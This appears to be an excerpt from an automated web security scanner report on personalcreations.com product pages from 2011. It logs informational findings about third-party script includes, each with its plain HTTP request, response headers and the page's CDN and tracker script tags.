<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.30. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-gifts-PHALLOW

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-halloween-gifts-PHALLOW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:18:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:18:54 GMT
Connection: close
Content-Length: 211789

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.31. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-treat-bags-PHALBAG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-halloween-treat-bags-PHALBAG HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:35 GMT
Connection: close
Content-Length: 110641

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.32. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-housewarming-gifts-PHOUSEW

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-housewarming-gifts-PHOUSEW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:21:26 PM?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:22:13 PM?0&9/3/2011 6:22:11 PM?0&9/3/2011 6:22:27 PM?0&9/3/2011 6:22:29 PM?0&9/3/2011 6:22:58 PM?0&9/3/2011 6:22:53 PM?0&9/3/2011 6:22:44 PM?0&9/3/2011 6:23:35 PM?0&9/3/2011 6:23:24 PM?0&9/3/2011 6:23:47 PM?0&9/3/2011 6:24:04 PM?0&9/3/2011 6:23:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:23:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:23:35 GMT
Connection: close
Content-Length: 319449

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.33. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-pet-gifts-PPETBSL

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-pet-gifts-PPETBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:30 GMT
Connection: close
Content-Length: 268297

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.34. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-romantic-gifts-PLARBSL

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-romantic-gifts-PLARBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
